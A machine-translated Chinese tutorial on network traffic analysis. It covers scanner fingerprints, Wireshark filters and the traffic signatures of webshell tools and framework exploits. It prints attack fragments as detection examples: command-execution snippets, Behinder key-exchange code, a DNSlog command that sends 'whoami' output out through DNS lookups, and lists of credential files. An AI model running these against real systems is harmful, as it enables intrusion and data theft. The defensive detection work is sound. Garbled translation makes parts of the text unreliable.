网络安全流量分析，网络安全流量分析报告

网络流量分析是通过捕获网络内流动的数据包，参考数据包的内部数据，进行相关的协议、流量分析和统计，发现网络运行过程中出现的问题的过程。

流量分析常使用工具

1.wireshark 2.tcpdump（拦截和分包数据包的工具） 3.RawCap（Windows 开源软件）

常用流量分析技巧：

1. 异常检测2. 指纹认证3. 明文传输4. 图像提取

常见的扫描仪指纹特征：（如标题部分所示）

AWVS:

acunetix_wvs_security_test acunetix

acunetix_wvs acunetix_test

Acunetix-方面-密码：Cookie:

acunetix_wvs_security_test X-Forwarded-Host:

acunetix_wvs_security_test X-Forwarder-For:

acunetix_wvs-security_test 主机：

acunetix_wvs_security_test

内萨：

x_forwarded_for:nessus

推荐人：nessus

主机：nessus

网火花：

X 扫描仪： netsparker 位置：

NetsparkerAccept:netsparker/chechCookie:

netsparkerCookie:NETSPARKER

应用扫描：

标头内容类型：Appscan

内容类型：AppScanHeader

接受：Appscan 用户代理：Appscan

sqlmap:

用户代理：sqlmap1.2.8#stab

如果您看到包含这些特征的流量，则表明您的网络可能受到攻击。

钢丝鲨鱼：

（TCP数据包示例）

wireshark的常见过滤规则：

1、过滤源ip，语法：

ip.src==IP 或ip.src eq IP

2、目的ip：ip.dst == IP或 ip.dst eq IP

3、指定主机ip，源或目的： ip.host == IP或 ip.host eq IP，或者用ip.addr（addr与host作用一样）

您可以使用and 和or 进行过滤

4、端口过滤非常常用，要指明协议是tcp还是udp，可以用srcport，dstport，port，端口可以用比较符合，=，

过滤目的端口为80的TCP数据包

5、协议过滤

仅显示TCP 数据包

仅显示HTTP 消息

6、过滤HTTP的GET请求和POST请求，以及HTTP过滤内容：

http.request.method==GET

7、过滤HTTP协议的响应包，响应码是200的（contains–内容）

8、跟踪TCP、HTTP流等

流量特征

SQL注入类流量：

SQL注入攻击的发生是因为服务器直接执行用户输入的语句而没有对其进行有效的检查和过滤。

如果攻击是使用工具发起的，则可以通过工具的指纹直接判断。

手动测试时，可以检查请求包中是否有明显的SQL查询语句，如Select、sleep、database()等。

命令执行类流量：

远程命令/代码执行漏洞(RCE) 是最具破坏性的安全漏洞之一，它们允许仅使用远程访问权限执行系统命令。

ASP执行系统命令：

CreateObject(\’wscript.shell\’).exec(\’cmd.exe /c

ipconfig\’).StdOut.ReadAll%

常见命令：

dir、ping、whoami、ipconfig、ifconfig、systeminfo 等用|| 符号连接。

PHP系统命令执行函数：

执行（）

系统（）

直通()

shell_exec()

JSP执行系统命令：

Runtimerun=Runtime.getRuntime();

run.exec(\’ipconfig\’);

常见的代码执行函数：

eval()assert()preg_replace()create_function()

array_map() call_user_func() call_user_func_array()

菜刀webshell连接流量：

WebShell通常是由一句话木马引起的。

一句话木马：

PHP：

应用价格：

ASP.NET:

页面语言=“Jscript”%

目前主流的WebShell管理工具包括： 菜刀蚁剑哥斯拉冰蝎子

菜刀数据包流量特征：

1、请求包中：ua头为百度、火狐（弱功能）。

2、请求体中包含eavl、base64等特征字符。

3.请求体中传递的payload是base64编码的，有固定的

QGluaV9zZXQoImRpc3BsYXlfZXJyb3JzIiwiMCIPO0BzZXRfdGltZV9saW1pdCgwKTtpZihQSFBfVkVS

U0lPTjwnNS4zLjAnKXtAc2V0X21hZ2ljX3F1b3Rlc19ydW50aW1lKDApO307ZWNobygiWEBZIik7Jichi

分段编码

如果你看开头的base64_，可以看到用了一把刀。

Antjian WebShell连接流量：

蚁剑数据包流量特征：

一个典型的句子具有以下特点：

每个请求的正文以@ini_set(“display_errors”, “0”);@set_time_limit(0) 开头。而后面有一个像base64这样的字符，并且带有base64加密的payload，数据包的payload内容包含几个段，所有这些都是使用base加密的。可以看到相关的路径、命令等。响应包的结果响应格式为随机数+响应内容+随机数。

该图像经过Base64 加密。

冰蝎webshell连接流量：

冰蝎2.0

Ice Scorpion 是一个基于Java 的新型Webshell 客户端，可动态加密通信流量。

Ice Scorpion的通信过程可以分为两个阶段：密钥协商和加密传输。

(1)第一阶段：关键谈判

攻击者通过GET 请求服务器密钥。

这是代码部分：

@错误报告(0);

会话开始（）；

if (isset($_GET[\’pass\’]))

{

$key=substr(md5(uniqid(rand())),16);

$_SESSION[\’k\’]=$key;

打印$key。

}

服务器使用之前生成的密钥对请求的post 数据进行AES128 解密。

服务器使用随机数的前16 位作为密钥，将其存储在会话的$_SESSION 变量中，并将密钥返回给攻击者。

当输入命令操作时，请求方法变为POST。

使用除法器生成数组，获取数组第一个元素的值，最后进行eval。

显然，结果也是加密返回的

第1 步：协商会话密钥

步骤2：使用密钥AES 加密您的流量

（三）功能概述

a.ACCEPT字段

Ice Scorpion 2 中的默认Accept 字段值非常具体，并且每个阶段都相同。

Accept: 文本/html，图像/gif，图像/jpeg，* q=.2，*/*

b.UA字段

Ice Scorpion 包含超过10 个UserAgent，每次连接到shell 时都会随机选择并使用其中一个。但他们都比较老，容易

检测到，但ua 标头可能被burp 修改。

冰蝎3.0

与Ice Scorpion 2相比，Ice Scorpion 3取消了动态密钥检索。许多WAF 和其他设备现在都进行Ice Scorpion 2 流量特征分析，因此在3.0 中，只有在没有动态密钥的交互失败后才会取消动态密钥检索。正常按键交互阶段。可以使用密码的md5 结果的前16 位来验证密钥生成。

钥匙固定

1. 服务器查找缓存文件基质（md5（key），16）。

2. 服务器搜索代码

3. 枚举密钥来爆破和解密AES

数据包加密分析：

当您请求php 文件连接到服务器时，关键的$key $_SESSION 变量将保存在服务器上的会话中。

然后，服务器使用生成的密钥来解密所请求的POST 数据包的内容。后续的运行代码可能与冰蝎2相同，不再赘述。

其流量特点：

(1) Accept header 有application/xhtml+xmlapplication/xmlapplication/signed-exchange 这是一个弱功能

(2) ua header的这个特征是一个弱特征。 Ice Scorpion 3.0 中内置的默认16 个userAgent 相对过时。它也可以用作WAF 规则功能，因为很少有人真正使用它

冰蝎4.0

相比3.0版本，Ice Scorpion v4.0有更多的内容更新，包括开放了传输协议的自定义功能。

另外，Ice Scorpion v4.0版本不再附带服务器端代码，因为加解密功能不固定，服务器端也是动态生成的。

生成木马：点击左上角的发送协议，选择default_aes协议，点击生成服务器，即可创建服务器文件，同时生成木马文件。

为了方便加解密完整性验证，Ice Scorpion提供了即时加解密验证功能，启动加解密功能后可以直接在窗口底部进行验证。

点击保存即可在服务器文件中生成木马。

交通特点：

(1) 受理领域：

(2)Content-Type字段

(3) 用户代理字段：Ice Scorpion 设置了10 个不同的用户代理，每次连接到shell 时都会随机选择其中之一。

哥斯拉webshell连接流量：

添加配置。

Godzilla 是一个基于流量和完全HTTP 加密的Web shell 管理工具。

交通特点是：

DNS外连流量：

在真正的渗透测试中，由于缺乏回声，可能无法准确判断是否存在漏洞，渗透测试人员可能会在不存在的漏洞上浪费大量精力。可以与DNSlog平台结合。

当存在no-echo漏洞的主机访问DNSlog平台时，通过DNS解析记录可以看到最终的执行结果，如下例：

ping `whoami`.cp2wj5.dnslog.cn (\’\’ 将内容作为命令执行)

这个说法实际上是：

Ping www-data.yafjqc.dnslog.cn

流量分析：

1. 通过Wireshark 检查您的DNS 流量，看看是否存在任何威胁内容。

2、查看DNS解析记录，从记录内容判断。

它将命令与访问的域名结合起来，打包并发送给DNS服务器。

DNS 流量在UDP（或TCP）端口53 上运行，可以通过端口53 上的过滤来提取。

1. 检查您是否有携带订单。

2. 检查是否访问了恶意域名。

ceye.io-dnslog平台

asdbj.ceye.io – 个人dnslog域名（随机）

XXXXXX.asndka.ceye.io – 成功检索数据

使用命令ipconfig /displaydn 查看本地DNS 解析记录缓存。

其他类型的恶意流量：

文件上传流量分析：

这通常是通过Web 完成的，您可以从http 开始过滤。通常，POST 方法使用POST 作为过滤条件。

http.request.method==POST

观察流量记录，大多数POST请求都在访问HTML文件，但只有一个数据帧在访问上传文件夹。

Uploads（文件上传） 以下（）是文件上传的类型。

通过查看数据框，您可以看到明显的内容类型绕过，并根据文件的内容对其进行分析。

（用于绕过的文件类型实际上是php文件木马）

基本可以参考

拒绝服务流量分析：

目前存在多种不同类型的拒绝服务攻击，但最典型的两种是SYN 泛洪攻击和UDP 泛洪攻击。 SYN 泛洪攻击以TCP 协议为目标，其主要目标是独占目标上所有可用的连接请求。 UDP洪泛攻击以UDP协议为目标，其主要目的是耗尽目标网络的带宽。这里我们以SYN泛洪为例。

SYN和UDP洪泛攻击（仅发送握手请求，不响应握手响应）

左下角限制显示过滤器如果选中，将显示经过显示过滤器过滤的数据包。

下面是一个正常的TCP 流程。

Syn Flood攻击流量，响应数据包不可见

目录遍历流量分析：

Linux敏感目录

1、/etc/passwd //账户信息

2、/etc/shadow //账户密码文件

3、/usr/local/app/apache2/conf/httpd.conf //Apache2默认配置文件

4、/usr/local/app/apache2/conf/extra/httpd-vhost.conf //虚拟网站配置

5、/usr/local/app/php5/lib/php.ini //PHP相关设置

6、/etc/httpd/conf/httpd.conf //Apache配置文件

7、/etc/my.conf //mysql配置文件

Windows敏感目录：

1,c:\\boot.ini //查看系统版本

2、c:\\windows\\system32\\inetsrv\\MetaBase.xml //IIS配置文件

3,c:\\windows\\repair\\sam //保存Windows系统初始安装密码

4、c:\\ProgramFiles\\mysql\\my.ini //MySQL设置

5,c:\\ProgramFiles\\mysql\\data\\mysql\\user.MYD //MySQL root密码

6、c:\\windows\\php.ini //php配置信息

通过检查数据、跟踪HTTP 数据流并验证URL 是否包含./字符，验证此数据包是否包含目录遍历利用过程。

（返回根目录）

常见框架漏洞及特征：

ThinkPHP 5.x RCE 漏洞

在5.0.23之前的版本中，get方法中未正确处理方法名称，导致攻击者可以调用Request类中的任意方法并构建可远程利用代码的漏洞利用链。

漏洞代码为：

根据漏洞源代码构建payload。

调用$this-{$this-method}($_POST) 语句。如果您可以控制$method 的值，则可以调用Request 类的任何方法。您可以通过调用构造函数方法__construct() 指定对$this-method 的覆盖。 check( )$method 方法值。

Struts2-009远程代码执行漏洞

漏洞原因：当前版本的操作接受进入OGNL 上下文的某些参数示例。可以将OGNL表达式放在example参数中，使用/XXXXXXX.acton?example=(example)(\’xxx\’)=1的方法来绕过它。这允许您绕过对# 和\\ 等特殊字符的官方支持。防御。

流量特征：GET请求后，组合域名中包含Struts2、exec、OGNL表达式等关键字。

您可以相应地构建有效负载来重新发送包。

shiro cve-2016-4437框架漏洞

第26 行的默认键值

第32 行为键分配默认键值。

解密或使用AES解密

特点：将RememberMe的内容保存在cookie中，通过解密RememberMe可以获取异常信息。 （Cookie:rememberMe字段描述利用hiro漏洞）

将rememberMe后的副本复制到土豆大师太郎平台并反编译。

以上#网络安全流量分析相关内容摘自网络，仅供参考。相关信息请参见官方公告。